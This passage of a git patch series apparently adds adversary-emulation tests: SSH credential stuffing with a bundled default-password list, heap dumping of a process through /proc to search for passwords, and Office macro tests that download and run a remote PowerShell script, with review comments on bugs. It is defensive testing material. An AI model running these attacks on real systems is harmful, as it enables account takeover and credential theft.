+##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run from Ubuntu ,Kali OR CentOS. +``` + + + +
From 8b308641929003da70f18d9a70f9468a2842af86 Mon Sep 17 00:00:00 2001
From: madhavbhatt
Date: Mon, 7 Jun 2021 15:17:31 -0700
Subject: [PATCH 07/84] T1110.004 : SSH Credential Stuffing FROM Linux , MacOS
---
 atomics/T1110.004/T1110.004.yaml | 64 +++
 atomics/T1110.004/src/credstuffuserpass.txt | 482 ++++++++++++++++++++
 2 files changed, 546 insertions(+)
 create mode 100644 atomics/T1110.004/T1110.004.yaml
 create mode 100644 atomics/T1110.004/src/credstuffuserpass.txt
diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml
new file mode 100644
index 00000000..29d8c304
--- /dev/null
+++ b/atomics/T1110.004/T1110.004.yaml
@@ -0,0 +1,64 @@
+---
+attack_technique: T1110.004
+display_name: 'Brute Force: Credential Stuffing'
+
+atomic_tests:
+- name: SSH Credential Stuffing From Linux
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
+- name: SSH Credential Stuffing From MacOS
+ description: |
+ Using username,password combination from a password dump to login over SSH.
+
+ supported_platforms:
+ - macos
+
+ input_arguments:
+ target_host:
+ description: IP Address / Hostname you want to target.
+ type: String
+ default: localhost
+
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ Requires SSHPASS
+ prereq_command: |
+ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+ brew install hudochenkov/sshpass/sshpass
+
+ executor:
+ name: bash
+ elevation_required: false
+ command: |
+ cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+
diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt
new file mode 100644
index 00000000..ed0295f7
--- /dev/null
+++ b/atomics/T1110.004/src/credstuffuserpass.txt
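Review bot: The macOS get_prereq_command runs `/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"`, which executes whatever that unpinned URL serves at the moment with no checksum or signature check, and the following `brew install hudochenkov/sshpass/sshpass` pulls from a third-party tap; at minimum the dependency description should state that Homebrew and the tap are installed this way, and the installer should be pinned to a release tag rather than `master`. Neither test has a cleanup_command, so the credential list copied to /tmp stays on the host after the run and `StrictHostKeyChecking=no` leaves a known_hosts entry behind; add `cleanup_command: |` followed by `rm -f /tmp/credstuffuserpass.txt` at the same indentation as the executor's other keys. The default target_host of localhost means the 482-line list from the diffstat is replayed against the machine running the test, which can lock local accounts out through PAM or sshd rate limiting, and the description should warn of that.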
@@ -0,0 +1,482 @@ +ADMINISTRATOR:ADMINISTRATOR +ADMN:admn +Administrator:3ware +Administrator:admin +Administrator:changeme +Administrator:ganteng +Administrator:letmein +Administrator:password +Administrator:pilou +Administrator:smcadmin +Any:12345 +CSG:SESAME +Cisco:Cisco +D-Link:D-Link +DTA:TJM +GEN1:gen1 +GEN2:gen2 +GlobalAdmin:GlobalAdmin +HTTP:HTTP +IntraStack:Asante +IntraSwitch:Asante +JDE:JDE +LUCENT01:UI-PSWD-01 +LUCENT02:UI-PSWD-02 +MDaemon:MServer +MICRO:RSX +Manager:Manager +Manager:friend +NAU:NAU +NETWORK:NETWORK +NICONEX:NICONEX +PBX:PBX +PFCUser:240653C9467E45 +PRODDTA:PRODDTA +PSEAdmin:$secure$ +PlcmSpIp:PlcmSpIp +Polycom:SpIp +RMUser1:password +SYSADM:sysadm +Sweex:Mysweex +USERID:PASSW0RD +User:Password +VNC:winterm +VTech:VTech +ZXDSL:ZXDSL +acc:acc +adfexc:adfexc +admin:0 +admin:0000 +admin:1111 +admin:11111111 +admin:123 +admin:1234 +admin:123456 +admin:1234567890 +admin:1234admin +admin:2222 +admin:22222 +admin:3477 +admin:3ascotel +admin:7ujMko0admin +admin:7ujMko0vizxv +admin:9999 +admin:Admin +admin:AitbISP4eCiG +admin:Ascend +admin:BRIDGE +admin:Intel +admin:MiniAP +admin:NetCache +admin:NetICs +admin:OCS +admin:P@55w0rd! 
+admin:PASSWORD +admin:Protector +admin:SMDR +admin:SUPER +admin:Symbol +admin:TANDBERG +admin:_Cisco +admin:access +admin:admin +admin:admin117.35.97.74 +admin:admin123 +admin:admin1234 +admin:administrator +admin:adminttd +admin:adslolitec +admin:adslroot +admin:adtran +admin:articon +admin:asante +admin:ascend +admin:asd +admin:atc123 +admin:atlantis +admin:backdoor +admin:barricade +admin:barricadei +admin:bintec +admin:cableroot +admin:changeme +admin:cisco +admin:comcomcom +admin:conexant +admin:default +admin:diamond +admin:enter +admin:epicrouter +admin:extendnet +admin:fliradmin +admin:giraff +admin:hagpolm1 +admin:hello +admin:help +admin:hp.com +admin:ironport +admin:isee +admin:jvc +admin:kont2004 +admin:letmein +admin:leviton +admin:linga +admin:meinsma +admin:michaelangelo +admin:michelangelo +admin:microbusiness +admin:motorola +admin:mu +admin:my_DEMARC +admin:netadmin +admin:noway +admin:oelinux123 +admin:operator +admin:p-assword +admin:pass +admin:password +admin:passwort +admin:pento +admin:pfsense +admin:private +admin:public +admin:pwp +admin:radius +admin:rmnetlm +admin:root +admin:secure +admin:service +admin:setup +admin:sitecom +admin:smallbusiness +admin:smcadmin +admin:speedxess +admin:superuser +admin:support +admin:switch +admin:synnet +admin:sysAdmin +admin:system +admin:tech +admin:ubnt +admin:visual +admin:w2402 +admin:wbox +admin:xad$l#12 +admin:xad$|#12 +admin:zoomadsl +admin2:changeme +administrator:administrator +administrator:changeme +adminstat:OCS +adminstrator:changeme +adminttd:adminttd +adminuser:OCS +adminview:OCS +alpine:alpine +anonymous:Exabyte +anonymous:any@ +apc:apc +at4400:at4400 +bbsd-client:NULL +bbsd-client:changeme2 +bciim:bciimpw +bcim:bcimpw +bcms:bcmspw +bcnas:bcnaspw +bcnas:pcnaspw +blue:bluepw +browse:browsepw +browse:looker +cablecom:router +cablemodem:robotics +cac_admin:cacadmin +cas:cascade +ccrusr:ccrusr +cellit:cellit +cgadmin:cgadmin +cisco:cisco +citel:citel +client:client +cmaker:cmaker 
+comcast:1234 +corecess:corecess +craft:craft +craft:craftpw +craft:crftpw +cusadmin:highspeed +cust:custpw +customer:none +dadmin:dadmin01 +davox:davox +debug:d.e.b.u.g +debug:synnet +default:antslq +default:default +default:password +deskalt:password +deskman:changeme +desknorm:password +deskres:password +device:device +dhs3mt:dhs3mt +dhs3pms:dhs3pms +diag:danger +diag:switch +disttech:4tas +draytek:1234 +e250:e250changeme +e500:e500changeme +echo:User +echo:echo +eng:engineer +enquiry:enquirypw +field:support +guest:1111 +guest:12345 +guest:123456 +guest:User +guest:guest +guest:xc3511 +halt:tlah +helpdesk:OCS +hsa:hsadb +hscroot:abc123 +iclock:timely +images:images +inads:inads +inads:indspw +init:initpw +install:llatsni +install:secret +installer:installer +intel:intel +intermec:intermec +intermec:intermec1QTPS +kermit:kermit +l2:l2 +l3:l3 +locate:locatepw +login:0 +login:1111 +login:8429 +login:access +login:admin +login:password +lp:lp +m1122:m1122 +maint:maint +maint:maintpw +maint:ntacdmax +maint:rwmaint +manage:!manage +manager:admin +manager:change_on_install +manager:friend +manager:manager +manager:sys +manuf:xxyyzz +mediator:mediator +mg3500:merlin +mlusr:mlusr +monitor:monitor +mother:fucker +mtch:mtch +mtcl:mtcl +naadmin:naadmin +netangr:attack +netman:netman +netopia:netopia +netrangr:attack +netscreen:netscreen +nms:nmspw +nokai:nokai +nokia:nokia +none:0 +none:admin +op:op +op:operator +operator:$chwarzepumpe +operator:1234 +operator:operator +oracle:oracle +patrol:patrol +piranha:piranha +piranha:q +poll:tech +public:public +radware:radware +rapport:r@p8p0r+ +rcust:rcustpw +readonly:lucenttech2 +readwrite:lucenttech1 +recovery:recovery +replicator:replicator +ro:ro +root:000000 +root:1111 +root:1234 +root:12345 +root:123456 +root:1234567890 +root:1234qwer +root:123qwe +root:1q2w3e4r5 +root:3ep5w2u +root:54321 +root:666666 +root:7ujMko0admin +root:7ujMko0vizxv +root:888888 +root:Admin +root:Cisco +root:GMB182 +root:LSiuY7pOmZG2s +root:Mau'dib 
+root:PASSWORD +root:ROOT500 +root:Serv4EMC +root:Zte521 +root:abc123 +root:admin +root:admin1234 +root:admin_1 +root:ahetzip8 +root:alpine +root:anko +root:antslq +root:ascend +root:attack +root:avtech +root:b120root +root:bananapi +root:blender +root:calvin +root:changeme +root:cms500 +root:comcom +root:coolphoenix579 +root:davox +root:default +root:dreambox +root:fivranne +root:ggdaseuaimhrke +root:hi3518 +root:iDirect +root:ikwb +root:ikwd +root:jauntech +root:juantech +root:jvbzd +root:klv123 +root:klv1234 +root:letacla +root:maxided +root:oelinux123 +root:openssh +root:openvpnas +root:orion99 +root:pa55w0rd +root:pass +root:password +root:permit +root:realtek +root:root +root:tini +root:tslinux +root:ubnt +root:user +root:vizxv +root:wyse +root:xc3511 +root:xmhdipc +root:zlxx. +root:zte9x15 +router:router +rw:rw +rwa:rwa +scmadmin:scmchangeme +scout:scout +secret:secret +secure:secure +security:security +service:smile +setup:changeme +setup:changeme! +setup:setup +smc:smcadmin +spcl:0 +storwatch:specialist +stratacom:stratauser +su:super +super:5777364 +super:super +super:surt +super.super:master +superadmin:secret +superman:21241036 +superman:talent +superuser:123456 +superuser:admin +supervisor:PlsChgMe! +supervisor:PlsChgMe1 +supervisor:supervisor +supervisor:zyad1234 +support:123 +support:1234 +support:12345 +support:123456 +support:admin +support:h179350 +support:login +support:support +support:supportpw +support:zlxx. 
+sys:uplink +sysadm:Admin +sysadm:PASS +sysadm:anicust +sysadm:sysadm +sysadmin:PASS +sysadmin:password +sysadmin:sysadmin +system:change_on_install +system:password +system:sys +system/manager:sys/change_on_install +target:password +teacher:password +tech:ANYCOM +tech:ILMI +tech:field +tech:tech +telco:telco +telecom:telecom +tellabs:tellabs#1 +telnet:telnet +temp1:password +test:test +tiara:tiaranet +tiger:tiger123 +topicalt:password +topicnorm:password +topicres:password +ubnt:ubnt +user:123456 +user:pass +user:password +user:public +user:tivonpw +user:user +vcr:NetVCR +volition:volition +vt100:public +webadmin:1234 +webadmin:webadmin +websecadm:changeme +wlse:wlsedb +wradmin:trancell +write:private +xd:xd +xxx:cascade +zyfwp:PrOw!aN_fXp From 47e1147dc1299bd7ae92677b20bcf9b22bdc25ff Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Fri, 4 Jun 2021 17:14:49 -0600 Subject: [PATCH 08/84] Added T1003.007 OS Credential Dumping: Proc Filesystem --- atomics/T1003.007/T1003.007.yaml | 56 ++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 atomics/T1003.007/T1003.007.yaml diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml new file mode 100644 index 00000000..5ed6039e --- /dev/null +++ b/atomics/T1003.007/T1003.007.yaml 
@@ -0,0 +1,56 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory (Local)
+ description: |
+ Using `/proc/$PID/mem`, where $PID is the target process ID,
+ copy process memory to an external file so it can be searched or exfiltrated later.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ output_file:
+ description: Path where captured results will be placed
+ type: Path
+ default: /tmp/T1003.007.bin
+ script_path:
+ description: Path to script generating the target process
+ type: Path
+ default: /tmp/T1003.007.sh
+ pid_term:
+ description: Unique string to use to identify target process
+ type: String
+ default: T1003.007
+
+ dependencies:
+ - description: |
+ Script to launch target process must exist
+ prereq_command: |
+ test -f #{script_path}
+ grep "#{pid_term}" #{script_path}
+ get_prereq_command: |
+ echo '#!/bin/sh' > #{script_path}
+ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+ - description: |
+ Script to launch target process must be executable
+ prereq_command: |
+ test -x #{script_path}
+ get_prereq_command: |
+ chmod +x #{script_path}
+
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ sh #{script_path}
+ PID=$(pgrep -n -f "#{pid_term}")
+ HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+ MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+ MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+ MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+ grep -i "PASS" "#{output_file}"
+ cleanup_command: |
+ rm -f "#{output_file}"
From 6b3206b3789d24064cc43359a19aa9f1763ab748 Mon Sep 17 00:00:00 2001
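Review bot: `MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))` re-reads two values that are already decimal as hexadecimal, since `MEM_START` and `MEM_STOP` were converted with `$((0x...))` on the two lines above; the computed size is therefore wrong (generally far too large), so `dd` runs past the end of the `[heap]` mapping until the kernel rejects the read, and the test only appears to work because `dd` keeps the bytes it copied before the error. The fix is `MEM_SIZE=$((MEM_STOP - MEM_START))`. In the same `command:` block, `ibs=1` issues one read syscall per byte; because `/proc/$PID/maps` ranges are page-aligned the copy can use `bs=4096 skip=$((MEM_START/4096)) count=$((MEM_SIZE/4096))` instead. Nothing checks that `pgrep -n -f` found a process, so an empty `PID` turns the later paths into `/proc//maps`; a `[ -n "$PID" ] || exit 1` after the `pgrep` line would make that failure explicit.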
From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Tue, 8 Jun 2021 16:49:23 -0600 Subject: [PATCH 09/84] added Python script for T1003.007 --- atomics/T1003.007/T1003.007.yaml | 64 ++++++++++++++++++++++++++---- atomics/T1003.007/src/dump_heap.py | 31 +++++++++++++++ 2 files changed, 87 insertions(+), 8 deletions(-) create mode 100644 atomics/T1003.007/src/dump_heap.py diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index 5ed6039e..d6e49b4a 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -2,9 +2,9 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: -- name: Dump individual process memory (Local) +- name: Dump individual process memory with sh (Local) description: | - Using `/proc/$PID/mem`, where $PID is the target process ID, + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: @@ -33,12 +33,6 @@ atomic_tests: get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - - description: | - Script to launch target process must be executable - prereq_command: | - test -x #{script_path} - get_prereq_command: | - chmod +x #{script_path} executor: name: sh 
@@ -54,3 +48,57 @@ atomic_tests: grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" + +- name: Dump individual process memory with Python (Local) + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so it can be searched or exfiltrated later. + + supported_platforms: + - linux + + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007.bin + script_path: + description: Path to script generating the target process + type: Path + default: /tmp/T1003.007.sh + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + + dependencies: + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Requires Python + prereq_command: | + (which python || which python3 || which python2) + get_prereq_command: | + echo "Python 2.7+ or 3.4+ must be installed" + + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: | + rm -f "#{output_file}" diff --git a/atomics/T1003.007/src/dump_heap.py b/atomics/T1003.007/src/dump_heap.py new file mode 100644 index 00000000..34d479c7 --- /dev/null +++ b/atomics/T1003.007/src/dump_heap.py 
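Review bot: The `python_script` input argument is described as `Path to script generating the target process`, which is copied from `script_path`; it should read `Path to the Python script that dumps the target process heap`. `PYTHON=$(which python || which python3 || which python2)` prefers `python`, which on many distributions is still Python 2, and the `dump_heap.py` added in this same commit uses `next(filter(...))`, which raises `TypeError` on Python 2 because `filter` returns a list there; reordering to `which python3 || which python || which python2` avoids that. The `Requires Python` dependency's `prereq_command` runs the same `which` chain, so it passes on a host that has only Python 2 even though the test will then fail. The default `PathToAtomicsFolder/T1003.007/src/dump_heap.py` has no leading `$`, unlike the `$PathToAtomicsFolder` used by the other Linux atomics in this series — worth confirming which form the runner substitutes on Linux.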
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+ python dump_proc.py
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+ # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
+ heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+ heap_range = heap_line.split(' ')[0]
+ mem_start = int(heap_range.split('-')[0], 16)
+ mem_stop = int(heap_range.split('-')[1], 16)
+ mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+ mem_file.seek(mem_start, 0)
+ heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+ ofile.write(heap_mem)
From a3e66311c51e1f9e1727b6946e68a621c4bdf521 Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Wed, 9 Jun 2021 11:51:35 -0500 Subject: [PATCH 10/84] Update T1204.002.yaml (#1503) added pls version setting to tests using IWR Co-authored-by: Carrie Roberts --- atomics/T1204.002/T1204.002.yaml | 5 +++++ 1 file changed, 5 insertions(+)
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 971dda55..8c749447 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
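Review bot: `next(filter(lambda line: "[heap]" in line, maps_file))` works only on Python 3, where `filter` is lazy; on Python 2 `filter` returns a list and `next()` raises `TypeError`, which contradicts the `Python 2.7+` support claimed by the accompanying YAML. A generator expression is portable and also lets the no-heap case fail clearly: `heap_line = next((l for l in maps_file if "[heap]" in l), None)` followed by `if heap_line is None: sys.exit("no [heap] mapping for pid {}".format(process_id))` (with `import sys`). The module docstring's usage line names `dump_proc.py` and omits the two positional arguments; `python dump_heap.py PID OUTPUT_FILE` matches the argparse definition below it. `mem_file.read(mem_size)` can return fewer bytes than requested if the heap shrinks between reading `maps` and `mem`; a one-line comment noting that race would help the next maintainer.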
@@ -36,6 +36,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -91,6 +92,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -126,6 +128,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" 
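Review bot: Assigning `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` replaces the process-wide protocol set rather than extending it, so on a host that already negotiates TLS 1.3 the line added in each of this file's hunks restricts every later `iwr` in the session to TLS 1.2 only. The additive form `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12` enables 1.2 without removing anything. Since the same line is repeated in each executor, a comment on the first occurrence such as `# Windows PowerShell 5.1 defaults to TLS 1.0/1.1, which GitHub no longer accepts` would record why it is needed. Not introduced by this change but visible in every hunk: `IEX (iwr ...)` still executes whatever the `master` branch serves, with no pinned commit or hash check.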
@@ -160,6 +163,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -285,6 +289,7 @@ atomic_tests: Write-Host "You will need to install Google Chrome manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell From 7e64b11098bbae06475f2745b78332ff68ebd058 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:52:02 +0000 Subject: [PATCH 11/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 +++++ atomics/T1204.002/T1204.002.md | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ffb927c7..db3672dc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -58262,6 +58262,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58323,6 +58324,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58361,6 +58363,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58398,6 +58401,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} 
@@ -58532,6 +58536,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index eda78a1e..fdd9a4c2 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -50,6 +50,7 @@ References: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -138,6 +139,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" 
@@ -188,6 +190,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -237,6 +240,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -390,6 +394,7 @@ and pull down the script and execute it. By default the payload will execute cal ```powershell +[Net.ServicePointManager]::SecurityProtocol = 